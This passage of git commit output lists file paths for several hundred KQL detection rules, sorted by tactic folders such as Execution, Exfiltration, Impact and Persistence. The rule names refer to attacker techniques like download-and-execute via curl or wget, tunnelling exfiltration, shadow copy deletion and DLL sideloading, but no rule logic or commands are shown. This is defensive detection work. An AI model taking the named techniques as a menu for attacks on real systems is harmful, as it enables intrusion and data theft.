KQL/rules/Execution/silenttrinity_stager_msbuild_activity.kql create mode 100644 KQL/rules/Execution/sql_client_tools_powershell_session_detection.kql create mode 100644 KQL/rules/Execution/start_windows_service_via_net_exe.kql create mode 100644 KQL/rules/Execution/successful_account_login_via_wmi.kql create mode 100644 KQL/rules/Execution/suspicious_binaries_and_scripts_in_public_folder.kql create mode 100644 KQL/rules/Execution/suspicious_binary_in_user_directory_spawned_from_office_application.kql create mode 100644 KQL/rules/Execution/suspicious_child_process_of_bginfo_exe.kql create mode 100644 KQL/rules/Execution/suspicious_deno_file_written_from_remote_source.kql create mode 100644 KQL/rules/Execution/suspicious_download_and_execute_pattern_via_curl_wget.kql create mode 100644 KQL/rules/Execution/suspicious_electron_application_child_processes.kql create mode 100644 KQL/rules/Execution/suspicious_encoded_and_obfuscated_reflection_assembly_load_function_call.kql create mode 100644 KQL/rules/Execution/suspicious_encoded_powershell_command_line.kql create mode 100644 KQL/rules/Execution/suspicious_execution_location_of_wermgr_exe.kql create mode 100644 KQL/rules/Execution/suspicious_execution_of_powershell_with_base64.kql create mode 100644 KQL/rules/Execution/suspicious_explorer_process_with_whitespace_padding_clickfix_filefix.kql create mode 100644 KQL/rules/Execution/suspicious_file_characteristics_due_to_missing_fields.kql create mode 100644 KQL/rules/Execution/suspicious_file_created_in_perflogs.kql create mode 100644 KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_curl_exe.kql create mode 100644 KQL/rules/Execution/suspicious_file_download_from_file_sharing_domain_via_wget_exe.kql create mode 100644 KQL/rules/Execution/suspicious_file_download_from_ip_via_curl_exe.kql create mode 100644 KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe.kql create mode 100644 KQL/rules/Execution/suspicious_file_download_from_ip_via_wget_exe_paths.kql create mode 100644 KQL/rules/Execution/suspicious_file_execution_from_internet_hosted_webdav_share.kql create mode 100644 KQL/rules/Execution/suspicious_greedy_compression_using_rar_exe.kql create mode 100644 KQL/rules/Execution/suspicious_installer_package_child_process.kql create mode 100644 KQL/rules/Execution/suspicious_interactive_powershell_as_system.kql create mode 100644 KQL/rules/Execution/suspicious_invocation_of_shell_via_awk_linux.kql create mode 100644 KQL/rules/Execution/suspicious_invocation_of_shell_via_rsync.kql create mode 100644 KQL/rules/Execution/suspicious_java_children_processes.kql create mode 100644 KQL/rules/Execution/suspicious_microsoft_office_child_process_macos.kql create mode 100644 KQL/rules/Execution/suspicious_mshta_exe_execution_patterns.kql create mode 100644 KQL/rules/Execution/suspicious_nohup_execution.kql create mode 100644 KQL/rules/Execution/suspicious_outlook_child_process.kql create mode 100644 KQL/rules/Execution/suspicious_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql create mode 100644 KQL/rules/Execution/suspicious_powershell_download_and_execute_pattern.kql create mode 100644 KQL/rules/Execution/suspicious_powershell_encoded_command_patterns.kql create mode 100644 KQL/rules/Execution/suspicious_powershell_iex_execution_patterns.kql create mode 100644 KQL/rules/Execution/suspicious_powershell_parameter_substring.kql create mode 100644 KQL/rules/Execution/suspicious_powershell_parent_process.kql create mode 100644 KQL/rules/Execution/suspicious_process_created_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/suspicious_program_names.kql create mode 100644 KQL/rules/Execution/suspicious_remote_child_process_from_outlook.kql create mode 100644 KQL/rules/Execution/suspicious_runscripthelper_exe.kql create mode 100644 KQL/rules/Execution/suspicious_scan_loop_network.kql create mode 100644 KQL/rules/Execution/suspicious_script_execution_from_temp_folder.kql create mode 100644 KQL/rules/Execution/suspicious_space_characters_in_runmru_registry_path_clickfix.kql create mode 100644 KQL/rules/Execution/suspicious_space_characters_in_typedpaths_registry_path_filefix.kql create mode 100644 KQL/rules/Execution/suspicious_spool_service_child_process.kql create mode 100644 KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql create mode 100644 KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql create mode 100644 KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql create mode 100644 KQL/rules/Execution/suspicious_wmiprvse_child_process.kql create mode 100644 KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql create mode 100644 KQL/rules/Execution/suspicious_zipexec_execution.kql create mode 100644 KQL/rules/Execution/sysprep_on_appdata_folder.kql create mode 100644 KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql create mode 100644 KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql create mode 100644 KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql create mode 100644 KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql create mode 100644 KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql create mode 100644 KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql create mode 100644 KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql create mode 100644 KQL/rules/Execution/use_of_fsharp_interpreters.kql create mode 100644 KQL/rules/Execution/use_of_openconsole.kql create mode 100644 KQL/rules/Execution/use_of_pcalua_for_execution.kql create mode 100644 KQL/rules/Execution/vba_dll_loaded_via_office_application.kql create mode 100644 KQL/rules/Execution/visual_studio_nodejstools_pressanykey_arbitrary_binary_execution.kql create mode 100644 KQL/rules/Execution/visual_studio_nodejstools_pressanykey_renamed_execution.kql create mode 100644 KQL/rules/Execution/vmtoolsd_suspicious_child_process.kql create mode 100644 KQL/rules/Execution/windows_hotfix_updates_reconnaissance_via_wmic_exe.kql create mode 100644 KQL/rules/Execution/windows_shell_scripting_application_file_write_to_suspicious_folder.kql create mode 100644 KQL/rules/Execution/winsxs_executable_file_creation_by_non_system_process.kql create mode 100644 KQL/rules/Execution/wmic_remote_command_execution.kql create mode 100644 KQL/rules/Execution/wmiprvse_spawned_a_process.kql create mode 100644 KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack.kql create mode 100644 KQL/rules/Execution/wmiprvse_wbemcomn_dll_hijack_file.kql create mode 100644 KQL/rules/Execution/wscript_or_cscript_dropper_file.kql create mode 100644 KQL/rules/Execution/wscript_shell_run_in_commandline.kql create mode 100644 KQL/rules/Execution/wsl_child_process_anomaly.kql create mode 100644 KQL/rules/Execution/wusa_exe_executed_by_parent_process_located_in_suspicious_location.kql create mode 100644 KQL/rules/Exfiltration/active_directory_structure_export_via_csvde_exe.kql create mode 100644 KQL/rules/Exfiltration/active_directory_structure_export_via_ldifde_exe.kql create mode 100644 KQL/rules/Exfiltration/arbitrary_file_download_via_configsecuritypolicy_exe.kql create mode 100644 KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_initiated.kql create mode 100644 KQL/rules/Exfiltration/communication_to_ngrok_tunneling_service_linux.kql create mode 100644 KQL/rules/Exfiltration/disk_image_creation_via_hdiutil_macos.kql create mode 100644 KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql create mode 100644 KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql create mode 100644 KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql create mode 100644 KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql create mode 100644 KQL/rules/Exfiltration/lolbas_data_exfiltration_by_datasvcutil_exe.kql create mode 100644 KQL/rules/Exfiltration/network_connection_initiated_to_btunnels_domains.kql create mode 100644 KQL/rules/Exfiltration/network_connection_initiated_to_cloudflared_tunnels_domains.kql create mode 100644 KQL/rules/Exfiltration/network_connection_initiated_to_devtunnels_domain.kql create mode 100644 KQL/rules/Exfiltration/network_connection_initiated_to_mega_nz.kql create mode 100644 KQL/rules/Exfiltration/network_connection_initiated_to_visual_studio_code_tunnels_domain.kql create mode 100644 KQL/rules/Exfiltration/process_initiated_network_connection_to_ngrok_domain.kql create mode 100644 KQL/rules/Exfiltration/pua_rclone_execution.kql create mode 100644 KQL/rules/Exfiltration/pua_restic_backup_tool_execution.kql create mode 100644 KQL/rules/Exfiltration/python_webserver_execution_linux.kql create mode 100644 KQL/rules/Exfiltration/rclone_config_file_creation.kql create mode 100644 KQL/rules/Exfiltration/split_a_file_into_pieces.kql create mode 100644 KQL/rules/Exfiltration/suspicious_curl_file_upload_linux.kql create mode 100644 KQL/rules/Exfiltration/suspicious_outbound_smtp_connections.kql create mode 100644 KQL/rules/Exfiltration/suspicious_powershell_mailbox_export_to_share.kql create mode 100644 KQL/rules/Exfiltration/suspicious_redirection_to_local_admin_share.kql create mode 100644 KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql create mode 100644 KQL/rules/Exfiltration/tap_installer_execution.kql create mode 100644 KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql create mode 100644 KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql create mode 100644 KQL/rules/Impact/backup_files_deleted.kql create mode 100644 KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql create mode 100644 KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql create mode 100644 KQL/rules/Impact/dd_file_overwrite.kql create mode 100644 KQL/rules/Impact/delete_all_scheduled_tasks.kql create mode 100644 KQL/rules/Impact/delete_important_scheduled_task.kql create mode 100644 KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql create mode 100644 KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql create mode 100644 KQL/rules/Impact/disable_important_scheduled_task.kql create mode 100644 KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql create mode 100644 KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql create mode 100644 KQL/rules/Impact/history_file_deletion.kql create mode 100644 KQL/rules/Impact/linux_crypto_mining_indicators.kql create mode 100644 KQL/rules/Impact/linux_crypto_mining_pool_connections.kql create mode 100644 KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql create mode 100644 KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql create mode 100644 KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql create mode 100644 KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql create mode 100644 KQL/rules/Impact/new_root_or_ca_or_authroot_certificate_to_store.kql create mode 100644 KQL/rules/Impact/portable_gpg_exe_execution.kql create mode 100644 KQL/rules/Impact/potential_crypto_mining_activity.kql create mode 100644 KQL/rules/Impact/potential_file_overwrite_via_sysinternals_sdelete.kql create mode 100644 KQL/rules/Impact/potential_ransomware_activity_using_legalnotice_message.kql create mode 100644 KQL/rules/Impact/potential_secure_deletion_with_sdelete.kql create mode 100644 KQL/rules/Impact/potential_suspicious_change_to_sensitive_critical_files.kql create mode 100644 KQL/rules/Impact/registry_disable_system_restore.kql create mode 100644 KQL/rules/Impact/renamed_gpg_exe_execution.kql create mode 100644 KQL/rules/Impact/renamed_sysinternals_sdelete_execution.kql create mode 100644 KQL/rules/Impact/sensitive_file_access_via_volume_shadow_copy_backup.kql create mode 100644 KQL/rules/Impact/stop_windows_service_via_net_exe.kql create mode 100644 KQL/rules/Impact/stop_windows_service_via_powershell_stop_service.kql create mode 100644 KQL/rules/Impact/stop_windows_service_via_sc_exe.kql create mode 100644 KQL/rules/Impact/suspicious_creation_txt_file_in_user_desktop.kql create mode 100644 KQL/rules/Impact/suspicious_execution_of_shutdown.kql create mode 100644 KQL/rules/Impact/suspicious_execution_of_shutdown_to_log_out.kql create mode 100644 KQL/rules/Impact/suspicious_macos_firmware_activity.kql create mode 100644 KQL/rules/Impact/suspicious_reg_add_bitlocker.kql create mode 100644 KQL/rules/Impact/system_shutdown_reboot_macos.kql create mode 100644 KQL/rules/Impact/time_machine_backup_deletion_attempt_via_tmutil_macos.kql create mode 100644 KQL/rules/Impact/time_machine_backup_disabled_via_tmutil_macos.kql create mode 100644 KQL/rules/Impact/user_has_been_deleted_via_userdel.kql create mode 100644 KQL/rules/Impact/windows_backup_deleted_via_wbadmin_exe.kql create mode 100644 KQL/rules/Impact/windows_recovery_environment_disabled_via_reagentc.kql create mode 100644 KQL/rules/Initial Access/disk_image_mounting_via_hdiutil_macos.kql create mode 100644 KQL/rules/Initial Access/iso_file_created_within_temp_folders.kql create mode 100644 KQL/rules/Initial Access/iso_or_image_mount_indicator_in_recent_files.kql create mode 100644 KQL/rules/Initial Access/octopus_scanner_malware.kql create mode 100644 KQL/rules/Initial Access/office_macro_file_creation.kql create mode 100644 KQL/rules/Initial Access/office_macro_file_creation_from_suspicious_process.kql create mode 100644 KQL/rules/Initial Access/office_macro_file_download.kql create mode 100644 KQL/rules/Initial Access/phishing_pattern_iso_in_archive.kql create mode 100644 KQL/rules/Initial Access/remote_access_tool_screenconnect_server_web_shell_execution.kql create mode 100644 KQL/rules/Initial Access/running_chrome_vpn_extensions_via_the_registry_2_vpn_extension.kql create mode 100644 KQL/rules/Initial Access/shell_process_spawned_by_java_exe.kql create mode 100644 KQL/rules/Initial Access/suspicious_browser_child_process_macos.kql create mode 100644 KQL/rules/Initial Access/suspicious_child_process_of_sql_server.kql create mode 100644 KQL/rules/Initial Access/suspicious_child_process_of_veeam_dabatase.kql create mode 100644 KQL/rules/Initial Access/suspicious_double_extension_file_execution.kql create mode 100644 KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql create mode 100644 KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql create mode 100644 KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql create mode 100644 KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql create mode 100644 KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql create mode 100644 KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql create mode 100644 KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql create mode 100644 KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql create mode 100644 KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql create mode 100644 KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql create mode 100644 KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql create mode 100644 KQL/rules/Initial Access/terminal_service_process_spawn.kql create mode 100644 KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql create mode 100644 KQL/rules/Initial Access/windows_registry_trust_record_modification.kql create mode 100644 KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql create mode 100644 KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql create mode 100644 KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql create mode 100644 KQL/rules/Lateral Movement/mmc_spawning_windows_shell.kql create mode 100644 KQL/rules/Lateral Movement/mstsc_exe_execution_from_uncommon_parent.kql create mode 100644 KQL/rules/Lateral Movement/new_port_forwarding_rule_added_via_netsh_exe.kql create mode 100644 KQL/rules/Lateral Movement/new_portproxy_registry_entry_added.kql create mode 100644 KQL/rules/Lateral Movement/new_remote_desktop_connection_initiated_via_mstsc_exe.kql create mode 100644 KQL/rules/Lateral Movement/outbound_rdp_connections_over_non_standard_tools.kql create mode 100644 KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack.kql create mode 100644 KQL/rules/Lateral Movement/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql create mode 100644 KQL/rules/Lateral Movement/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql create mode 100644 KQL/rules/Lateral Movement/potential_lateral_movement_via_windows_remote_shell.kql create mode 100644 KQL/rules/Lateral Movement/potential_mstsc_shadowing_activity.kql create mode 100644 KQL/rules/Lateral Movement/potential_remote_desktop_tunneling.kql create mode 100644 KQL/rules/Lateral Movement/privilege_escalation_via_named_pipe_impersonation.kql create mode 100644 KQL/rules/Lateral Movement/psexec_remote_execution_file_artefact.kql create mode 100644 KQL/rules/Lateral Movement/rdp_port_forwarding_rule_added_via_netsh_exe.kql create mode 100644 KQL/rules/Lateral Movement/rundll32_execution_without_parameters.kql create mode 100644 KQL/rules/Lateral Movement/suspicious_csi_exe_usage.kql create mode 100644 KQL/rules/Lateral Movement/suspicious_rdp_redirect_using_tscon.kql create mode 100644 KQL/rules/Lateral Movement/suspicious_sysaidserver_child.kql create mode 100644 KQL/rules/Lateral Movement/suspicious_ultravnc_execution.kql create mode 100644 KQL/rules/Lateral Movement/windows_admin_share_mount_via_net_exe.kql create mode 100644 KQL/rules/Lateral Movement/windows_internet_hosted_webdav_share_mount_via_net_exe.kql create mode 100644 KQL/rules/Lateral Movement/windows_share_mount_via_net_exe.kql create mode 100644 KQL/rules/Lateral Movement/winrs_local_command_execution.kql create mode 100644 KQL/rules/Lateral Movement/wmi_activescripteventconsumers_activity_via_scrcons_exe_dll_load.kql create mode 100644 KQL/rules/Lateral Movement/wmiexec_default_output_file.kql create mode 100644 KQL/rules/Persistence/abuse_of_service_permissions_to_hide_services_via_set_service.kql create mode 100644 KQL/rules/Persistence/activate_suppression_of_windows_security_center_notifications.kql create mode 100644 KQL/rules/Persistence/add_debugger_entry_to_aedebug_for_persistence.kql create mode 100644 KQL/rules/Persistence/add_debugger_entry_to_hangs_key_for_persistence.kql create mode 100644 KQL/rules/Persistence/add_disallowrun_execution_to_registry.kql create mode 100644 KQL/rules/Persistence/allow_rdp_remote_assistance_feature.kql create mode 100644 KQL/rules/Persistence/change_the_fax_dll.kql create mode 100644 KQL/rules/Persistence/change_user_account_associated_with_the_fax_service.kql create mode 100644 KQL/rules/Persistence/chopper_webshell_process_pattern.kql create mode 100644 KQL/rules/Persistence/chromium_browser_instance_executed_with_custom_extension.kql create mode 100644 KQL/rules/Persistence/clickonce_trust_prompt_tampering.kql create mode 100644 KQL/rules/Persistence/com_hijack_via_sdclt.kql create mode 100644 KQL/rules/Persistence/communication_to_uncommon_destination_ports.kql create mode 100644 KQL/rules/Persistence/crashcontrol_crashdump_disabled.kql create mode 100644 KQL/rules/Persistence/creation_of_a_local_hidden_user_account_by_registry.kql create mode 100644 KQL/rules/Persistence/creation_of_a_local_user_account.kql create mode 100644 KQL/rules/Persistence/disable_internal_tools_or_feature_in_registry.kql create mode 100644 KQL/rules/Persistence/disable_windows_security_center_notifications.kql create mode 100644 KQL/rules/Persistence/dll_search_order_hijackig_via_additional_space_in_path.kql create mode 100644 KQL/rules/Persistence/dns_over_https_enabled_by_registry.kql create mode 100644 KQL/rules/Persistence/dropping_of_password_filter_dll.kql create mode 100644 KQL/rules/Persistence/enable_lm_hash_storage.kql create mode 100644 KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql create mode 100644 KQL/rules/Persistence/enabling_cor_profiler_environment_variables.kql create mode 100644 KQL/rules/Persistence/esxi_account_creation_via_esxcli.kql create mode 100644 KQL/rules/Persistence/esxi_admin_permission_assigned_to_account_via_esxcli.kql create mode 100644 KQL/rules/Persistence/etw_logging_disabled_for_rpcrt4_dll.kql create mode 100644 KQL/rules/Persistence/etw_logging_disabled_for_scm.kql create mode 100644 KQL/rules/Persistence/etw_logging_disabled_in_net_processes_sysmon_registry.kql create mode 100644 KQL/rules/Persistence/hacktool_powerup_write_hijack_dll.kql create mode 100644 KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql create mode 100644 KQL/rules/Persistence/ie_change_domain_zone.kql create mode 100644 KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql create mode 100644 KQL/rules/Persistence/imports_registry_key_from_a_file.kql create mode 100644 KQL/rules/Persistence/imports_registry_key_from_an_ads.kql create mode 100644 KQL/rules/Persistence/interactive_at_job.kql create mode 100644 KQL/rules/Persistence/linux_webshell_indicators.kql create mode 100644 KQL/rules/Persistence/macos_emond_launch_daemon.kql create mode 100644 KQL/rules/Persistence/macro_enabled_in_a_potentially_suspicious_document.kql create mode 100644 KQL/rules/Persistence/malicious_dll_file_dropped_in_the_teams_or_onedrive_folder.kql create mode 100644 KQL/rules/Persistence/mask_system_power_settings_via_systemctl.kql create mode 100644 KQL/rules/Persistence/modification_of_ie_registry_settings.kql create mode 100644 KQL/rules/Persistence/modify_user_shell_folders_startup_value.kql create mode 100644 KQL/rules/Persistence/monitoring_for_persistence_via_bits.kql create mode 100644 KQL/rules/Persistence/msexchange_transport_agent_installation.kql create mode 100644 KQL/rules/Persistence/net_ngenassemblyusagelog_registry_key_tamper.kql create mode 100644 KQL/rules/Persistence/netntlm_downgrade_attack_registry.kql create mode 100644 KQL/rules/Persistence/new_bginfo_exe_custom_db_path_registry_configuration.kql create mode 100644 KQL/rules/Persistence/new_bginfo_exe_custom_vbscript_registry_configuration.kql create mode 100644 KQL/rules/Persistence/new_bginfo_exe_custom_wmi_query_registry_configuration.kql create mode 100644 KQL/rules/Persistence/new_kernel_driver_via_sc_exe.kql create mode 100644 KQL/rules/Persistence/new_odbc_driver_registered.kql create mode 100644 KQL/rules/Persistence/new_service_creation_using_powershell.kql create mode 100644 KQL/rules/Persistence/new_service_creation_using_sc_exe.kql create mode 100644 KQL/rules/Persistence/new_timeproviders_registered_with_uncommon_dll_name.kql create mode 100644 KQL/rules/Persistence/new_user_created_via_net_exe.kql create mode 100644 KQL/rules/Persistence/new_user_created_via_net_exe_with_never_expire_option.kql create mode 100644 KQL/rules/Persistence/non_privileged_usage_of_reg_or_powershell.kql create mode 100644 KQL/rules/Persistence/office_application_startup_office_test.kql create mode 100644 KQL/rules/Persistence/office_macros_warning_disabled.kql create mode 100644 KQL/rules/Persistence/outlook_enableunsafeclientmailrules_setting_enabled_registry.kql create mode 100644 KQL/rules/Persistence/outlook_security_settings_updated_registry.kql create mode 100644 KQL/rules/Persistence/path_to_screensaver_binary_modified.kql create mode 100644 KQL/rules/Persistence/persistence_via_disk_cleanup_handler_autorun.kql create mode 100644 KQL/rules/Persistence/persistence_via_hhctrl_ocx.kql create mode 100644 KQL/rules/Persistence/persistence_via_new_sip_provider.kql create mode 100644 KQL/rules/Persistence/persistence_via_sticky_key_backdoor.kql create mode 100644 KQL/rules/Persistence/persistence_via_typedpaths_commandline.kql create mode 100644 KQL/rules/Persistence/possible_privilege_escalation_via_weak_service_permissions.kql create mode 100644 KQL/rules/Persistence/potential_appverifui_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_avkkid_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_azure_browser_sso_abuse.kql create mode 100644 KQL/rules/Persistence/potential_binary_or_script_dropper_via_powershell.kql create mode 100644 KQL/rules/Persistence/potential_cobaltstrike_service_installations_registry.kql create mode 100644 KQL/rules/Persistence/potential_eacore_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_edputil_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_goopdate_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_iviewers_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_mfdetours_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_autodialdll.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_mpnotify.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_outlook_form.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_typedpaths.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql create mode 100644 KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql create mode 100644 KQL/rules/Persistence/potential_qakbot_registry_activity.kql create mode 100644 KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql create mode 100644 KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql create mode 100644 KQL/rules/Persistence/potential_roboform_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql create mode 100644 KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql create mode 100644 KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql create mode 100644 KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql create mode 100644 KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql create mode 100644 KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql create mode 100644 KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql create mode 100644 KQL/rules/Persistence/powershell_module_file_created.kql create mode 100644 KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql create mode 100644 KQL/rules/Persistence/powershell_profile_modification.kql create mode 100644 KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql create mode 100644 KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql create mode 100644 KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql create mode 100644 KQL/rules/Persistence/pua_system_informer_execution.kql create mode 100644 KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql create mode 100644 KQL/rules/Persistence/reg_add_suspicious_paths.kql create mode 100644 KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql create mode 100644 KQL/rules/Persistence/registry_explorer_policy_modification.kql create mode 100644 KQL/rules/Persistence/registry_hide_function_from_user.kql create mode 100644 KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql create mode 100644 KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql create mode 100644 KQL/rules/Persistence/registry_modification_via_regini_exe.kql create mode 100644 KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql create mode 100644 KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql create mode 100644 KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql create mode 100644 KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql create mode 100644 KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql create mode 100644 KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql create mode 100644 KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql create mode 100644 KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql create mode 100644 KQL/rules/Persistence/run_once_task_configuration_in_registry.kql create mode 100644 KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql create mode 100644 KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql create mode 100644 KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql create mode 100644 KQL/rules/Persistence/service_binary_in_suspicious_folder.kql create mode 100644 KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql create mode 100644 KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql create mode 100644 KQL/rules/Persistence/servicedll_hijack.kql create mode 100644 KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql create mode 100644 KQL/rules/Persistence/shimcache_flush.kql create mode 100644 KQL/rules/Persistence/startup_item_file_created_macos.kql create mode 100644 KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql create mode 100644 KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql create mode 100644 KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql create mode 100644 KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql create mode 100644 KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql create mode 100644 KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql create mode 100644 KQL/rules/Persistence/suspicious_iis_module_registration.kql create mode 100644 KQL/rules/Persistence/suspicious_new_service_creation.kql create mode 100644 KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql create mode 100644 KQL/rules/Persistence/suspicious_process_by_web_server_process.kql create mode 100644 